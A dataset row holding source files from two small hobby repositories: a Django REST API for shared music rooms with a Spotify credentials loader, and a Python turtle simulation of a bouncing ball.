815ca0e923c4595d2c2bad010198b2d1d6e95bfa
c937a2f164888197a72ce5dd957b7ebf7189fb18
refs/heads/master
2023-03-09T14:07:27.549864
2021-02-23T13:44:34
2021-02-23T13:44:34
331,396,976
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6214796304702759, "alphanum_fraction": 0.6290675401687622, "avg_line_length": 43.5, "blob_id": "ddb430babfb8e7719cfa63c508b64b847fa75201", "content_id": "bd1de3309310454bf2c88e4728813fd26513f4d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6853, "license_type": "no_license", "max_line_length": 117, "num_lines": 154, "path": "/api/views.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\nfrom .models import Room\nfrom .serializers import RoomSerializer, CreateRoomSerializer, UpdateRoomSerializer\n\n\nclass RoomView(generics.ListAPIView):\n queryset = Room.objects.all()\n serializer_class = RoomSerializer\n\n\nclass CreateRoomView(APIView):\n # creates new room\n # called from CreateRoomPage.js component\n serializer_class = CreateRoomSerializer\n\n def post(self, request):\n # if there wasn't any session on device, create new session with it's key\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n serializer = self.serializer_class(data=request.data)\n\n # if serializer's validation went successfully, get data from it\n if serializer.is_valid():\n guest_can_pause = serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n\n # each host is identified by it's session key\n host = self.request.session.session_key\n queryset = Room.objects.filter(host=host)\n\n # existing of queryset means that user already has created a room once\n # and to create new room, we need to change 'guest_can_pause' and 'votes_to_skip' fields\n if queryset.exists():\n room = queryset[0]\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n self.request.session['room_code'] = room.code\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n\n # otherwise we need to create a room from zero, and put a session key as a host value\n else:\n room = Room(host=host, guest_can_pause=guest_can_pause, votes_to_skip=votes_to_skip)\n room.save()\n self.request.session['room_code'] = room.code\n return Response(RoomSerializer(room).data, status=status.HTTP_201_CREATED)\n\n return Response({'Bad Request': 'Invalid data...'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass GetRoom(APIView):\n # gets information about room by it's code\n # called from Room.js component\n lookup_url_kwarg = 'code'\n\n def get(self, request):\n # find if there is a code in request\n code = request.GET.get(self.lookup_url_kwarg)\n if code is not None:\n # select room with given code\n room = Room.objects.filter(code=code)\n if room.exists():\n # get data dictionary of room\n data = RoomSerializer(room[0]).data\n # add new boolean field \"is_host\"\n data['is_host'] = self.request.session.session_key == room[0].host\n return Response(data, status=status.HTTP_200_OK)\n return Response({'Room Not Found': 'Invalid Room Code'}, status=status.HTTP_404_NOT_FOUND)\n return Response({'Bad Request': 'Code parameter not found in request'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JoinRoom(APIView):\n # joins the room by given code\n # called from JoinRoomPage.js component\n lookup_url_kwarg = \"code\"\n\n def post(self, request):\n if not 
self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # find if there is a code in request\n code = request.data.get(self.lookup_url_kwarg)\n if code is not None:\n # select rooms with given code\n room_result = Room.objects.filter(code=code)\n if room_result.exists() > 0:\n # add 'room_code' value to session data\n self.request.session['room_code'] = code\n return Response({'message': 'Room Joined!'}, status=status.HTTP_200_OK)\n return Response({'Bad request': 'Invalid Room Code'}, status=status.HTTP_404_NOT_FOUND)\n return Response({'Bad request': 'Invalid post data, code key not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserInRoom(APIView):\n # checks if user is in room\n # called from HomePage.js component\n def get(self, request):\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # if user is not in the room, 'code' will be equal to None\n data = {\n 'code': self.request.session.get('room_code'),\n }\n return JsonResponse(data, status=status.HTTP_200_OK)\n\n\nclass LeaveRoom(APIView):\n # leaves the room\n # called from Room.js component\n def post(self, request):\n if 'room_code' in self.request.session:\n # remove 'room_code' value from session data\n self.request.session.pop('room_code')\n # if host leaves the room, delete room from database\n host_id = self.request.session.session_key\n room_result = Room.objects.filter(host=host_id)\n if len(room_result) > 0:\n room = room_result[0]\n room.delete()\n return Response({'Message': 'Success'}, status=status.HTTP_200_OK)\n\n\nclass UpdateRoom(APIView):\n # updates room data\n # called from CreateRoomPage.js component\n serializer_class = UpdateRoomSerializer\n\n def patch(self, request):\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # initialize serializer\n serializer = self.serializer_class(data=self.request.data)\n if serializer.is_valid():\n # getting data from serializer\n votes_to_skip = serializer.data.get('votes_to_skip')\n guest_can_pause = serializer.data.get('guest_can_pause')\n code = serializer.data.get('code')\n # checking if room exists\n queryset = Room.objects.filter(code=code)\n if not queryset.exists():\n return Response({'Message': 'Room not found'}, status=status.HTTP_404_NOT_FOUND)\n room = queryset[0]\n # only host can modify the room\n user_id = self.request.session.session_key\n if room.host != user_id:\n return Response({'Message': 'You are not a host'}, status=status.HTTP_403_FORBIDDEN)\n # changing and saving data\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n return Response({'Bad Request': 'Invalid data...'}, status=status.HTTP_400_BAD_REQUEST)\n" }, { "alpha_fraction": 0.6734693646430969, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 23.5, "blob_id": "37e706097cb31f6dd2a67b423bfa4546aebbd7dd", "content_id": "d650cd265893ad6617f181c88d9f1a9dd247684b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 56, "num_lines": 8, "path": "/spotify/credentials.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from os import environ as env\nfrom varenv import load_vars\n\n\nload_vars()\nCLIENT_ID = 
env[\"CLIENT_ID\"]\nCLIENT_SECRET = env[\"CLIENT_SECRET\"]\nREDIRECT_URI = \"http://127.0.0.1:8000/spotify/redirect/\"\n" }, { "alpha_fraction": 0.6884779334068298, "alphanum_fraction": 0.6884779334068298, "avg_line_length": 27.1200008392334, "blob_id": "ecba6d7a8c95cf8fd7872ea6f9cd6cbecfb6308d", "content_id": "be4e97da15c9f0baf14a95ceb3f62351a08ab6e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 89, "num_lines": 25, "path": "/api/serializers.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Room\n\n\n# Serializer for Room model\nclass RoomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Room\n fields = ('id', 'code', 'host', 'guest_can_pause', 'votes_to_skip', 'created_at')\n\n\n# Serializer for creating Room model\nclass CreateRoomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Room\n fields = ('guest_can_pause', 'votes_to_skip')\n\n\n# Serializer for updating Room model\nclass UpdateRoomSerializer(serializers.ModelSerializer):\n code = serializers.CharField(validators=[])\n\n class Meta:\n model = Room\n fields = ('guest_can_pause', 'votes_to_skip', 'code')\n" } ]
3
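
The row above archives a Django REST Framework API (opavelkachalo/music_controller) in which a room's host is identified purely by the Django session key: CreateRoomView stores request.session.session_key in Room.host, and UpdateRoom refuses changes when the caller's key differs. A condensed sketch of that guard (the view name CloseRoom is hypothetical; Room and the imports mirror the archived files, so this runs only inside a comparable Django app):

from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Room                      # as in the archived api/ app

class CloseRoom(APIView):
    def post(self, request):
        # every visitor gets a session key; it doubles as the host id
        if not request.session.exists(request.session.session_key):
            request.session.create()
        room = Room.objects.filter(code=request.data.get('code')).first()
        if room is None:
            return Response({'Message': 'Room not found'},
                            status=status.HTTP_404_NOT_FOUND)
        if room.host != request.session.session_key:
            # only the session that created the room may destroy it
            return Response({'Message': 'You are not a host'},
                            status=status.HTTP_403_FORBIDDEN)
        room.delete()
        return Response({'Message': 'Success'}, status=status.HTTP_200_OK)

The same three steps — ensure a session, look up the room, compare room.host against the caller's session key — recur across the archived CreateRoomView, LeaveRoom, and UpdateRoom.
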
kristiHandayani/knuckleBall
https://github.com/kristiHandayani/knuckleBall
51deec313ac86a6736d9af99814267d89db94f7c
d1a75c23b99195a17e8074022b3628329406931e
8508e8f9369e0436b521f9d618d26f62f5391eef
refs/heads/master
2020-09-02T08:21:33.700186
2019-11-02T16:12:41
2019-11-02T16:12:41
219,178,259
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5854383111000061, "alphanum_fraction": 0.6121842265129089, "avg_line_length": 16.243244171142578, "blob_id": "640eaa1890fa6cc18f83252b7d1d97e1d60377a3", "content_id": "4eb9aae08e16defe130d47859defed4d82665771", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "no_license", "max_line_length": 42, "num_lines": 37, "path": "/knuckleBall.py", "repo_name": "kristiHandayani/knuckleBall", "src_encoding": "UTF-8", "text": "import turtle\r\n\r\n# define ball atribute\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"black\")\r\nwn.title(\"Knuckle Ball Simulator\")\r\n\r\nball = turtle.Turtle()\r\nball.shape(\"circle\")\r\nball.color(\"green\")\r\nball.penup()\r\nball.speed(0)\r\n\r\n# define ball position before the kick\r\nball.goto(-200, -200)\r\n\r\n# define ball movement \r\nball.dy = 6\r\nball.dx = 4\r\n\r\n# slow down the ball\r\ngravity = 0.1\r\n\r\nwhile True:\r\n # change ball position\r\n ball.dy -= gravity\r\n ball.sety(ball.ycor() + ball.dy)\r\n ball.setx(ball.xcor() + ball.dx)\r\n\r\n if ball.ycor() < -200:\r\n ball.dy *= -1\r\n\r\n # assume the ball already in goal post\r\n if ball.xcor() >300:\r\n break\r\n\r\nwn.mainloop()" }, { "alpha_fraction": 0.7816901206970215, "alphanum_fraction": 0.7816901206970215, "avg_line_length": 22.66666603088379, "blob_id": "3792ce4106e2fb7ddb7924b41999ea357cd51d26", "content_id": "b52e1ee3fd749f4c40ddaa278f4baea404f32c4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/README.md", "repo_name": "kristiHandayani/knuckleBall", "src_encoding": "UTF-8", "text": "# knuckleBall\nSimulate how knuckle ball with Turtle\n\nto run this code, you need to install turtle first.\n\nrun this code : pip install turtles\n" } ]
2
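
The row above is a turtle-graphics ball simulation (kristiHandayani/knuckleBall): each frame subtracts a gravity constant from the vertical velocity, moves the ball, and flips dy at the floor — explicit Euler integration with a perfectly elastic bounce. (Note that turtle ships with the Python standard library, so the README's pip hint is unnecessary.) The update rule isolated from the graphics so it can be tested (function name and step count are illustrative):

def step(x, y, dx, dy, gravity=0.1, floor=-200):
    dy -= gravity          # gravity acts on the vertical velocity only
    y += dy
    x += dx
    if y < floor:          # perfectly elastic bounce off the floor
        dy = -dy
    return x, y, dx, dy

state = (-200.0, -200.0, 4.0, 6.0)   # start position and kick, as in the script
for _ in range(50):
    state = step(*state)
print(tuple(round(v, 1) for v in state))
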
ThanosPapas/diakrita
https://github.com/ThanosPapas/diakrita
a8ac3b4e12cc554e2210fcd5b976f900f9c4b1e1
5a3a47d0a75bc7b7738b01606879eec268928599
1a6e3fff5a1ba440d59d8c277292be79c4070323
refs/heads/main
2023-05-01T06:52:39.311903
2023-04-16T10:36:19
2023-04-16T10:36:19
344,625,588
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48953139781951904, "alphanum_fraction": 0.49651047587394714, "avg_line_length": 28.89230728149414, "blob_id": "2fc912d23c2c7baa58fe095cb1b6a5936a7c6bd0", "content_id": "4265711622cc5bd0b38ba0d896d33a35770a412f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2327, "license_type": "no_license", "max_line_length": 115, "num_lines": 65, "path": "/HavelHakimi.py", "repo_name": "ThanosPapas/diakrita", "src_encoding": "UTF-8", "text": "import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom random import choice\r\n\r\ndef test(lst, vathmos):\r\n G = nx.Graph()\r\n for i in range(len(lst)):\r\n x = choice(lst)\r\n while vathmos[x] == 0:\r\n x = choice(lst)\r\n tmp = vathmos[:]\r\n tmp[x] = 0 #για να μην συνδεθεί ο κόμβος με τον εαυτό του\r\n for j in range(vathmos[x]):\r\n ind = tmp.index(max(tmp))\r\n G.add_edge(x, ind)\r\n tmp[ind] -=1\r\n vathmos[ind] = tmp[ind] #αντιγράφω την αλλαγή στο original array\r\n tmp[ind] = 0 #για να μην συνδεθεί ο κόμβος με έναν άλλο πάνω από μία φορά (με παίδεψε πολύ αυτό!)\r\n vathmos[x] = 0\r\n if all(v==0 for v in vathmos):\r\n nx.draw_networkx(G)\r\n break\r\n\r\ndef check(lst):\r\n while True:\r\n lst.sort(reverse=True)\r\n x = lst[0]\r\n lst.pop(0)\r\n for i in range(x):\r\n try:\r\n lst[i] -= 1\r\n except IndexError:\r\n return False\r\n if any(v<0 for v in lst):\r\n return False\r\n if all(v==0 for v in lst):\r\n return True\r\n\r\ndef insert(n):\r\n lst = [i for i in range(n)]\r\n vathmos =[]\r\n for i in range(n):\r\n x = int(input(f\"Εισάγετε αριθμό δεσμών για τον {i + 1}ο κόμβο: \"))\r\n vathmos.append(x)\r\n if check(vathmos[:]): #ελέγχω αν η ακολουθία είναι γραφική, περνάω ένα αντίγραφο της λίστας με call by value\r\n test(lst, vathmos)\r\n else:\r\n print(\"Αυτή η ακολουθία δεν είναι γραφική.\")\r\n\r\ndef main():\r\n while True:\r\n x = input(\"Εισάγετε αριθμό κόμβων: \")\r\n try:\r\n n = int(x)\r\n if n <=1:\r\n print(\"Ο αριθμός πρέπει να είναι μεγαλύτερος του 1. \", end='')\r\n continue\r\n insert(n)\r\n plt.show()\r\n break\r\n except ValueError:\r\n print(\"Απαιτείται ακέραιος αριθμός. \", end='')\r\n\r\nif __name__ == '__main__':\r\n main()" } ]
1
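
The row above (ThanosPapas/diakrita) implements the Havel–Hakimi construction: check() repeatedly removes the largest degree d and decrements the next d entries, declaring the sequence graphical when everything reaches zero, and test() then wires up an actual networkx graph — its Greek comments note that a node must not link to itself or to the same neighbour twice, and the prompts ask for the node count and per-node degrees. The graphicality test in its standard textbook form (function name and sample sequences are illustrative):

def is_graphical(degrees):
    seq = sorted(degrees, reverse=True)   # work on a copy, like check(vathmos[:])
    while seq and seq[0] > 0:
        d = seq.pop(0)                    # remove the largest remaining degree
        if d > len(seq):
            return False                  # too few vertices left to attach to
        for i in range(d):
            seq[i] -= 1                   # connect it to the d next-largest
            if seq[i] < 0:
                return False
        seq.sort(reverse=True)
    return True

print(is_graphical([3, 3, 2, 2, 1, 1]))   # -> True
print(is_graphical([4, 3, 2, 1]))         # -> False

A sequence of all zeros falls straight through the loop and is accepted, matching the repo's all(v==0 for v in lst) success test.
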
MahanFathi/OBJET
https://github.com/MahanFathi/OBJET
d62d0d613a0d0f826138c5f96de4a8093640503d
c6e2366327852c18b30dbf2f439931860dc26bf9
f53cfe7a05361580069a1255ede7424f52352af4
refs/heads/master
2021-02-07T14:58:13.206492
2020-04-27T10:07:00
2020-04-27T10:07:00
244,041,203
16
0
null
2020-02-29T21:03:33
2020-03-17T21:37:16
2020-03-17T22:16:42
C++
[ { "alpha_fraction": 0.6197793483734131, "alphanum_fraction": 0.6237194538116455, "avg_line_length": 28.172412872314453, "blob_id": "e69931404ce5874d72d2cd75653c72de68d9de10", "content_id": "49694de014dc869f233d1540a202c981271a1446", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2538, "license_type": "permissive", "max_line_length": 138, "num_lines": 87, "path": "/src/object.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"object.h\"\n\n\nObject::Object(const char* pathToObjectJSON, const std::string &name):\n name(name)\n{\n objectData = new data::ObjectData(pathToObjectJSON);\n // read file via ASSIMP\n Assimp::Importer importer;\n const aiScene* scene = importer.ReadFile(objectData->objPath, aiProcess_Triangulate | aiProcess_FlipUVs | aiProcess_CalcTangentSpace);\n\n // check for errors\n if(!scene || scene->mFlags & AI_SCENE_FLAGS_INCOMPLETE || !scene->mRootNode)\n {\n std::cout << \"ERROR::ASSIMP:: \" << importer.GetErrorString() << std::endl;\n return;\n }\n\n processNode(scene->mRootNode, scene);\n}\n\n\nvoid Object::draw(Shader* shader) const\n{\n // set material attributes\n shader->setUniform(\"material.color\", objectData->color);\n shader->setUniform(\"material.ambientStrength\", objectData->ambientStrength);\n shader->setUniform(\"material.diffuseStrength\", objectData->diffuseStrength);\n shader->setUniform(\"material.specularStrength\", objectData->specularStrength);\n shader->setUniform(\"material.shininess\", 16.0f);\n\n // draw all mesh\n for(unsigned int i = 0; i < meshes.size(); i++) {\n meshes[i].draw(shader);\n }\n}\n\n\nvoid Object::processNode(aiNode *node, const aiScene *scene)\n{\n for(unsigned int i = 0; i < node->mNumMeshes; i++)\n {\n aiMesh* mesh = scene->mMeshes[node->mMeshes[i]];\n meshes.push_back(processMesh(mesh, scene));\n }\n \n for(unsigned int i = 0; i < node->mNumChildren; i++)\n {\n processNode(node->mChildren[i], scene);\n }\n}\n\n\nMesh Object::processMesh(aiMesh *mesh, const aiScene *scene)\n{\n // data to fill\n std::vector<Vertex> vertices;\n std::vector<unsigned int> indices;\n\n for(unsigned int i = 0; i < mesh->mNumVertices; i++)\n {\n Vertex vertex;\n glm::vec3 vector;\n // positions\n vector.x = mesh->mVertices[i].x;\n vector.y = mesh->mVertices[i].y;\n vector.z = mesh->mVertices[i].z;\n vertex.Position = vector;\n // normals\n vector.x = mesh->mNormals[i].x;\n vector.y = mesh->mNormals[i].y;\n vector.z = mesh->mNormals[i].z;\n vertex.Normal = vector;\n\n vertices.push_back(vertex);\n }\n\n for(unsigned int i = 0; i < mesh->mNumFaces; i++)\n {\n aiFace face = mesh->mFaces[i];\n // retrieve all indices of the face and store them in the indices vector\n for(unsigned int j = 0; j < face.mNumIndices; j++)\n indices.push_back(face.mIndices[j]);\n }\n\n return Mesh(vertices, indices);\n}\n" }, { "alpha_fraction": 0.7019089460372925, "alphanum_fraction": 0.7048457860946655, "avg_line_length": 24.22222137451172, "blob_id": "b46fe417e450285575ad0c74c99ba93325b81495", "content_id": "e7504b8fa92d07c8764e27a693e57c320b038f74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 681, "license_type": "permissive", "max_line_length": 91, "num_lines": 27, "path": "/inc/shader.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <math.h>\n\n#include <GL/glew.h>\n#include <glm/glm.hpp>\n\n#include <string>\n#include <fstream>\n#include 
<streambuf>\n\nclass Shader {\n\npublic:\n GLuint ID;\n\n Shader(const std::string &vertexShaderScript, const std::string &fragmentShaderScript);\n void use() const;\n\n void setUniform(const std::string &name, const float &value) const;\n void setUniform(const std::string &name, const int &value) const;\n void setUniform(const std::string &name, const bool &value) const;\n void setUniform(const std::string &name, const glm::mat4 &value) const;\n void setUniform(const std::string &name, const glm::vec3 &value) const;\n\n};\n" }, { "alpha_fraction": 0.8201754093170166, "alphanum_fraction": 0.8201754093170166, "avg_line_length": 31.571428298950195, "blob_id": "8842630356ef54570b476b56ec01383460e7434d", "content_id": "cb5ecfd9469abaa2e9282edd60d1f9cce9f449b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 228, "license_type": "permissive", "max_line_length": 48, "num_lines": 7, "path": "/inc/glsls.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "// create a shader self-contained shared object\n#include <string>\n\nextern std::string objectVertexShader;\nextern std::string objectFragmentShader;\nextern std::string shadowVertexShader;\nextern std::string shadowFragmentShader;\n" }, { "alpha_fraction": 0.6245014071464539, "alphanum_fraction": 0.6393162608146667, "avg_line_length": 30.909090042114258, "blob_id": "5a48e1591222dcdaacc1f6fe19f6e354ebbda336", "content_id": "7a3a54aa26bd139fb865bb1cfde5b4adfbf48580", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1755, "license_type": "permissive", "max_line_length": 85, "num_lines": 55, "path": "/src/util.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <GLFW/glfw3.h>\n#include \"common.h\"\n\n\nvoid framebuffer_size_callback(GLFWwindow* window, int width, int height)\n{\n glViewport(0, 0, width, height);\n} \n\nvoid processInput(GLFWwindow *window)\n{\n if(glfwGetKey(window, GLFW_KEY_ESCAPE) == GLFW_PRESS)\n glfwSetWindowShouldClose(window, true);\n\n // cam adjustment\n const float cameraSpeed = 2.5f * deltaTime; // adjust accordingly\n if (glfwGetKey(window, GLFW_KEY_W) == GLFW_PRESS)\n cameraPos += cameraSpeed * cameraFront;\n if (glfwGetKey(window, GLFW_KEY_S) == GLFW_PRESS)\n cameraPos -= cameraSpeed * cameraFront;\n if (glfwGetKey(window, GLFW_KEY_A) == GLFW_PRESS)\n cameraPos -= glm::normalize(glm::cross(cameraFront, cameraUp)) * cameraSpeed;\n if (glfwGetKey(window, GLFW_KEY_D) == GLFW_PRESS)\n cameraPos += glm::normalize(glm::cross(cameraFront, cameraUp)) * cameraSpeed;\n}\n\nvoid mouse_callback(GLFWwindow* window, double xpos, double ypos) {\n static bool first = true;\n static float lastX;\n static float lastY;\n if (first) {\n lastX = xpos;\n lastY = ypos;\n first = false;\n }\n static float yaw{-90.0f};\n static float pitch{0.0f};\n float sensitivity = 0.05f;\n float offsetX = xpos - lastX;\n float offsetY = lastY - ypos;\n lastX = xpos;\n lastY = ypos;\n yaw += offsetX * sensitivity;\n pitch += offsetY * sensitivity;\n if(pitch > 89.0f)\n pitch = 89.0f;\n if(pitch < -89.0f)\n pitch = -89.0f;\n glm::vec3 direction;\n direction.x = cos(glm::radians(yaw)) * cos(glm::radians(pitch));\n direction.y = sin(glm::radians(pitch));\n direction.z = sin(glm::radians(yaw)) * cos(glm::radians(pitch));\n cameraFront = glm::normalize(direction);\n}\n" }, { "alpha_fraction": 0.7239958643913269, "alphanum_fraction": 0.729660153388977, "avg_line_length": 
30.8360652923584, "blob_id": "feefeebc07a107522e1b1e4a98b9cb1f50ec0d3a", "content_id": "10294c4597ef7efb1bb3cbeffa9028f3ea3c801c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1942, "license_type": "permissive", "max_line_length": 99, "num_lines": 61, "path": "/src/shader.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <string>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/type_ptr.hpp>\n\n#include \"shader.h\"\n\nShader::Shader(const std::string &vertexShaderScript, const std::string &fragmentShaderScript) {\n\n // vertex shader\n const char * vertexShaderSource = vertexShaderScript.c_str();\n GLuint vertexShader;\n vertexShader = glCreateShader(GL_VERTEX_SHADER);\n glShaderSource(vertexShader, 1, &vertexShaderSource, NULL);\n glCompileShader(vertexShader);\n\n // fragment shader\n const char * fragmentShaderSource = fragmentShaderScript.c_str();\n GLuint fragmentShader;\n fragmentShader = glCreateShader(GL_FRAGMENT_SHADER);\n glShaderSource(fragmentShader, 1, &fragmentShaderSource, NULL);\n glCompileShader(fragmentShader);\n\n // link shaders\n GLuint shaderProgram;\n shaderProgram = glCreateProgram();\n glAttachShader(shaderProgram, vertexShader);\n glAttachShader(shaderProgram, fragmentShader);\n glLinkProgram(shaderProgram);\n glUseProgram(shaderProgram);\n glDeleteShader(vertexShader);\n glDeleteShader(fragmentShader);\n\n ID = shaderProgram;\n}\n\nvoid Shader::use() const {\n glUseProgram(ID);\n}\n\n// util fuctions\nvoid Shader::setUniform(const std::string &name, const bool &value) const\n{\n glUniform1i(glGetUniformLocation(ID, name.c_str()), (int)value);\n}\nvoid Shader::setUniform(const std::string &name, const int &value) const\n{\n glUniform1i(glGetUniformLocation(ID, name.c_str()), value);\n}\nvoid Shader::setUniform(const std::string &name, const float &value) const\n{\n glUniform1f(glGetUniformLocation(ID, name.c_str()), value);\n}\nvoid Shader::setUniform(const std::string &name, const glm::mat4 &value) const\n{\n glUniformMatrix4fv(glGetUniformLocation(ID, name.c_str()), 1, GL_FALSE, glm::value_ptr(value));\n}\nvoid Shader::setUniform(const std::string &name, const glm::vec3 &value) const\n{\n glUniform3fv(glGetUniformLocation(ID, name.c_str()), 1, glm::value_ptr(value));\n}\n" }, { "alpha_fraction": 0.740963876247406, "alphanum_fraction": 0.759036123752594, "avg_line_length": 17.33333396911621, "blob_id": "08f6e66adc092c4fcfdd44798803800024566bb9", "content_id": "116e6f6f2d3f51442f980616c1c44ab669be535f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 166, "license_type": "permissive", "max_line_length": 29, "num_lines": 9, "path": "/inc/common.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <glm/glm.hpp>\n\nextern float deltaTime;\nextern glm::vec3 cameraPos;\nextern glm::vec3 cameraFront;\nextern glm::vec3 cameraUp;\n\n" }, { "alpha_fraction": 0.6021164059638977, "alphanum_fraction": 0.6074073910713196, "avg_line_length": 25.25, "blob_id": "ca60148641f83fc20fad0fc55bf2fdc6f4736b03", "content_id": "639f30b4a79bfb4b52aa384ab0e5527e23118bbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 945, "license_type": "permissive", "max_line_length": 117, "num_lines": 36, "path": "/Makefile", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": 
"BIN=main\n\nSRC_DIR=src\nINC_DIR=inc\nOBJ_DIR=obj\n\nPY_OUT_DIR=pyobjet\n\nOUT_DIR=$(OBJ_DIR)/$(SRC_DIR)\n\nCC=clang++\nCFLAGS=-std=c++11 -O3 -fPIC -Wall -I$(INC_DIR)/ -I.\n\nLIBS=-lGLEW -lGLU -lGL -lglfw -lassimp -lfreeimage -lpthread\n\nSRCS=OBJET.cpp $(wildcard $(SRC_DIR)/*.c*)\nOBJS=$(addprefix $(OBJ_DIR)/, $(patsubst %.cpp, %.o, $(SRCS)))\n\n\ndefault:\n\t$(CC) $(CFLAGS) $(LIBS) -o $(BIN) $(SRCS) $(BIN).cpp\n\npython: $(OUT_DIR) $(OBJS)\n\tswig -python -c++ -outdir $(PY_OUT_DIR) OBJET.i\n\t$(CC) -c -g $(CFLAGS) `pkg-config --cflags --libs python3` $(LIBS) OBJET.cpp OBJET_wrap.cxx\n\t$(CC) -shared $(CFLAGS) `pkg-config --cflags --libs python3` $(OBJS) $(LIBS) OBJET_wrap.o -o $(PY_OUT_DIR)/_OBJET.so\n\n$(OBJ_DIR)/%.o: %.cpp\n\t$(CC) -c -g $(CFLAGS) -o $@ $<\n\n$(OUT_DIR):\n\tmkdir -p $(OUT_DIR)\n\nclean:\n\trm -rf $(BIN) $(OBJ_DIR) OBJET_wrap.cxx OBJET_wrap.o _OBJET.so OBJET.o __pycache__\n\trm -rf $(PY_OUT_DIR)/__pycache__ $(PY_OUT_DIR)/OBJET.py $(PY_OUT_DIR)/_OBJET.so\n" }, { "alpha_fraction": 0.6782522201538086, "alphanum_fraction": 0.6792452931404114, "avg_line_length": 21.886363983154297, "blob_id": "34f231c3fa4b6da097f8f667825e59147d5c4977", "content_id": "d9bd13ec9d908d9057bce2b4bb712052b411219f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 80, "num_lines": 44, "path": "/OBJET.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <string>\n#include <vector>\n\n#include <GL/glew.h>\n#include <GLFW/glfw3.h>\n\n#include \"shader.h\"\n#include \"model.h\"\n\nclass OBJET\n{\npublic:\n /* Data */\n\n\n /* Function */\n OBJET(std::string pathToMetaJSON, int width, int heigth);\n void Draw();\n void ToImage(std::string pathToImage);\n std::vector<float> GetDepthMap();\n std::vector<int> GetImage();\n void SetCamera(std::vector<float> position, std::vector<float> target);\n void SetObjectPosition(std::string objectName, std::vector<float> position);\n void SetObjectYRotation(std::string objectName, float yRotation);\n void SetObjectScale(std::string objectName, float scale);\n\nprotected:\n /* Data */\n GLuint renderFramebuffer;\n GLuint depthMapFramebuffer;\n GLuint depthMap;\n\n unsigned width, height;\n unsigned shadowWidth, shadowHeight;\n GLFWwindow* window;\n Shader* objectShader;\n Shader* shadowShader;\n Model* model;\n\n /* Function */\n void InitOpenGL();\n void InitShaders();\n\n};\n" }, { "alpha_fraction": 0.7456359267234802, "alphanum_fraction": 0.7456359267234802, "avg_line_length": 21.27777862548828, "blob_id": "f95d1a5b28bc3a02c1fb26cac162c999494a6e1f", "content_id": "acbd46978b51c5a94e4af7514f2a968782f27daa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "permissive", "max_line_length": 48, "num_lines": 18, "path": "/src/glsls.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "// create a shader self-contained shared object\n#include <string>\n\nstd::string objectVertexShader =\n#include \"shaders/vertex_shader.glsl\"\n ;\n\nstd::string objectFragmentShader =\n#include 